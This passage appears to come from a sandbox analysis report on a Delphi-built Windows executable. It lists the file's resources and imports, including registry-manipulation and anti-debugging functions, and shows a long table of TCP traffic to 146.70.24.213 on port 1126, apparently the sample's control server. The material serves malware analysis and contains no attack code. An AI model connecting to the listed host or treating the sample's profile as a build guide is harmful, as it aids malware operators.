                                                    RT_ICON0x53081c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.7109929078014184
                                                    RT_STRING0x530c840x8b0data0.2648381294964029
                                                    RT_STRING0x5315340x2e4data0.4540540540540541
                                                    RT_STRING0x5318180x2a4data0.4896449704142012
                                                    RT_STRING0x531abc0x200data0.53125
                                                    RT_STRING0x531cbc0x1f0data0.5
                                                    RT_STRING0x531eac0x378data0.43243243243243246
                                                    RT_STRING0x5322240x390data0.39144736842105265
                                                    RT_STRING0x5325b40x2f0data0.4242021276595745
                                                    RT_STRING0x5328a40x488data0.3905172413793103
                                                    RT_STRING0x532d2c0x4e4data0.39217252396166136
                                                    RT_STRING0x5332100x3a4data0.4034334763948498
                                                    RT_STRING0x5335b40x34cdata0.40165876777251186
                                                    RT_STRING0x5339000x390data0.3355263157894737
                                                    RT_STRING0x533c900x3e0data0.43850806451612906
                                                    RT_STRING0x5340700x38cdata0.31167400881057267
                                                    RT_STRING0x5343fc0x3e0data0.42439516129032256
                                                    RT_STRING0x5347dc0x184data0.5412371134020618
                                                    RT_STRING0x5349600xd4data0.660377358490566
                                                    RT_STRING0x534a340x214data0.5
                                                    RT_STRING0x534c480x3c8data0.3822314049586777
                                                    RT_STRING0x5350100x3f4data0.391304347826087
                                                    RT_STRING0x5354040x47cdata0.3423344947735192
                                                    RT_STRING0x5358800x28cdata0.34662576687116564
                                                    RT_STRING0x535b0c0x454data0.41064981949458484
                                                    RT_STRING0x535f600x4b4data0.3953488372093023
                                                    RT_STRING0x5364140x4ccdata0.34446254071661236
                                                    RT_STRING0x5368e00x3b0data0.3792372881355932
                                                    RT_STRING0x536c900x3d8data0.34146341463414637
                                                    RT_STRING0x5370680x35cdata0.37906976744186044
                                                    RT_STRING0x5373c40xd0data0.5721153846153846
                                                    RT_STRING0x5374940xa0data0.65
                                                    RT_STRING0x5375340x394data0.4268558951965066
                                                    RT_STRING0x5378c80x434data0.3308550185873606
                                                    RT_STRING0x537cfc0x390data0.37609649122807015
                                                    RT_STRING0x53808c0x2dcdata0.38114754098360654
                                                    RT_STRING0x5383680x34cdata0.3246445497630332
                                                    RT_RCDATA0x5386b40x10data1.5
                                                    RT_RCDATA0x5386c40x3bbb7dataEnglishUnited States0.6175269656629732
                                                    RT_RCDATA0x57427c0xb78data0.4778610354223433
                                                    RT_RCDATA0x574df40x151Delphi compiled form 'TForm1'0.7210682492581603
                                                    RT_GROUP_CURSOR0x574f480x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                    RT_GROUP_CURSOR0x574f5c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                    RT_GROUP_CURSOR0x574f700x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                    RT_GROUP_CURSOR0x574f840x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                    RT_GROUP_CURSOR0x574f980x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                    RT_GROUP_CURSOR0x574fac0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                    RT_GROUP_CURSOR0x574fc00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                    RT_GROUP_ICON0x574fd40x5adata0.7
                                                    RT_VERSION0x5750300x368dataEnglishUnited States0.44954128440366975
                                                    DLLImport
                                                    oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                    advapi32.dllRegQueryValueExW, RegOpenKeyExW, RegCloseKey
                                                    user32.dllCharNextW, LoadStringW
                                                    kernel32.dllSleep, VirtualFree, VirtualAlloc, lstrlenW, VirtualQuery, QueryPerformanceCounter, GetTickCount, GetSystemInfo, GetVersion, CompareStringW, IsDBCSLeadByteEx, IsValidLocale, SetThreadLocale, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, GetLocaleInfoW, WideCharToMultiByte, MultiByteToWideChar, GetConsoleOutputCP, GetConsoleCP, GetACP, LoadLibraryExW, GetStartupInfoW, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetCommandLineW, FreeLibrary, GetLastError, UnhandledExceptionFilter, RtlUnwindEx, RtlUnwind, RaiseException, ExitProcess, ExitThread, SwitchToThread, GetCurrentThreadId, CreateThread, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, FindFirstFileW, FindClose, WriteFile, SetFilePointer, SetEndOfFile, ReadFile, GetFileType, GetFileSize, CreateFileW, GetStdHandle, CloseHandle
                                                    kernel32.dllGetProcAddress, RaiseException, LoadLibraryA, GetLastError, TlsSetValue, TlsGetValue, LocalFree, LocalAlloc, GetModuleHandleW, FreeLibrary
                                                    user32.dllSetClassLongPtrW, GetClassLongPtrW, SetWindowLongPtrW, GetWindowLongPtrW, CreateWindowExW, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCaret, SetWindowRgn, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetForegroundWindow, SetFocus, SetCursorPos, SetCursor, SetClipboardData, SetCapture, SetActiveWindow, SendMessageA, SendMessageW, ScrollWindow, ScreenToClient, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OpenClipboard, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsIconic, IsDialogMessageA, IsDialogMessageW, IsChild, InvalidateRect, InsertMenuItemW, InsertMenuW, HideCaret, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetScrollBarInfo, GetPropW, GetParent, GetWindow, GetMessagePos, GetMessageExtraInfo, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgCtrlID, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameW, GetClassInfoExW, GetClassInfoW, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EndMenu, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, CreateAcceleratorTableW, CopyImage, CopyIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharUpperW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BeginPaint, AdjustWindowRectEx, ActivateKeyboardLayout
                                                    gdi32.dllUnrealizeObject, StretchDIBits, StretchBlt, StartPage, StartDocW, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetRectRgn, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SetAbortProc, SelectPalette, SelectObject, SaveDC, RoundRect, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, Polygon, PolyBezierTo, PolyBezier, PlayEnhMetaFile, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectW, GetMapMode, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionW, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExcludeClipRect, EnumFontsW, EnumFontFamiliesExW, EndPage, EndDoc, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateICW, CreateHalftonePalette, CreateFontIndirectW, CreateDIBitmap, CreateDIBSection, CreateDCW, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileW, Chord, BitBlt, ArcTo, Arc, AngleArc, AbortDoc
                                                    version.dllVerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
                                                    kernel32.dllWriteFile, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, VerSetConditionMask, VerifyVersionInfoW, TryEnterCriticalSection, SwitchToThread, SuspendThread, Sleep, SizeofResource, SetThreadPriority, SetThreadLocale, SetLastError, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, ReadFile, RaiseException, QueryPerformanceFrequency, QueryPerformanceCounter, IsDebuggerPresent, MulDiv, LockResource, LocalFree, LoadResource, LoadLibraryW, LeaveCriticalSection, LCMapStringW, IsValidLocale, InitializeCriticalSection, HeapSize, HeapFree, HeapDestroy, HeapCreate, HeapAlloc, GlobalUnlock, GlobalLock, GlobalFree, GlobalFindAtomW, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomW, GetVersionExW, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadPriority, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeThread, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCPInfoExW, GetCPInfo, GetACP, FreeResource, FreeLibrary, FormatMessageW, FindResourceW, FindFirstFileW, FindClose, EnumSystemLocalesW, EnumResourceNamesW, EnumCalendarInfoW, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileW, CreateEventW, CompareStringW, CloseHandle
                                                    advapi32.dllRegUnLoadKeyW, RegSetValueExW, RegSaveKeyW, RegRestoreKeyW, RegReplaceKeyW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegLoadKeyW, RegFlushKey, RegEnumValueW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegConnectRegistryW, RegCloseKey
                                                    kernel32.dllSleep
                                                    oleaut32.dllSafeArrayGetElemsize, SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                                    oleaut32.dllGetErrorInfo, SysFreeString
                                                    ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoTaskMemAlloc, CoCreateInstance, CoUninitialize, CoInitialize, IsEqualGUID
                                                    comctl32.dllInitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_GetImageInfo, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Copy, ImageList_LoadImageW, ImageList_GetIcon, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_SetOverlayImage, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                    user32.dllEnumDisplayMonitors, GetMonitorInfoW, MonitorFromPoint, MonitorFromRect, MonitorFromWindow
                                                    shell32.dllShell_NotifyIconW
                                                    winspool.drvOpenPrinterW, EnumPrintersW, DocumentPropertiesW, ClosePrinter
                                                    winspool.drvGetDefaultPrinterW
                                                    NameOrdinalAddress
                                                    TMethodImplementationIntercept30x4991b0
                                                    __dbk_fcall_wrapper20x417300
                                                    dbkFCallWrapperAddr10x8a1f58
                                                    Language of compilation systemCountry where language is spokenMap
                                                    EnglishUnited States
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Oct 12, 2024 20:30:00.399132013 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:00.404023886 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:00.404205084 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:00.404987097 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:00.414812088 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:00.883095026 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:00.929819107 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:02.917604923 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:02.922460079 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:02.922538042 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:02.927318096 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.051928997 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.101763010 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.144721985 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.146791935 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.152003050 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.152211905 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.157188892 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.265583038 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.320375919 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.398209095 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.398663044 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.403740883 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.403822899 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.408830881 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.410028934 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.414997101 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.415083885 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.419981956 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.526123047 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.531107903 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.531157970 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.535962105 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.656977892 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.657099962 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.657162905 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.657176018 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.657193899 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.657202959 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.657211065 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.657259941 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.657666922 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.657702923 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.657736063 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.657772064 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.658003092 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.658051014 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.658058882 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.658111095 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.658144951 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.658154011 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.658180952 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.658243895 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.659364939 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.662022114 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.662075043 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.749943972 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.750000954 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.750015974 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.750031948 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.750041962 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.750046968 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.750062943 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.750067949 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.750077963 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.750118017 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.750277042 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.750324011 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.750327110 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.750350952 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.750369072 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.750382900 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.750391006 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.750416994 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.750888109 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.750982046 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.750996113 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.751009941 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.751024008 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.751029968 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.751039982 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.751054049 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.751060009 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.751094103 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.751804113 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.751832008 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.751841068 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.751847029 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.751877069 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.794157028 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.794208050 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.794245958 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.794271946 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.836324930 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.842551947 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.842571020 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.842593908 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.842614889 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.842631102 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.842648029 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.842730999 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.842731953 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.842731953 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.842825890 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.842842102 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.842855930 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.842870951 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.842881918 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.842911959 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.843389988 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.843414068 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.843430042 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.843445063 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.843461037 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.843540907 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.843540907 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.844058037 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.844073057 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.844088078 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.844103098 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.844113111 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.844119072 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.844134092 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.844137907 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.844150066 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.844165087 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.844187021 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.844206095 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.844816923 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.844831944 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.844856024 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.844855070 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.844880104 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.844896078 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.844902039 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.844909906 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.844927073 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.844932079 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.844942093 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.844969034 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.845707893 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.845722914 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.845737934 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.845746040 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.845786095 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.845789909 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.845802069 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.845817089 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.845832109 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.845843077 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.845855951 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.845869064 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.846546888 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.846599102 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.846626997 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.887641907 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.887701988 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.887702942 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.887738943 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.887772083 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.887783051 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.887806892 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.887861013 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.896444082 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.901349068 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.901407003 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.906316996 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.943564892 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.948412895 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:03.948493004 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:03.953331947 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:04.055258036 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:04.061501026 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:04.063417912 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:04.070102930 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:04.391887903 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:04.392307997 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:04.392339945 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:04.392390966 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:04.392424107 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:04.392457008 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:04.392467022 CEST497101126192.168.2.6146.70.24.213
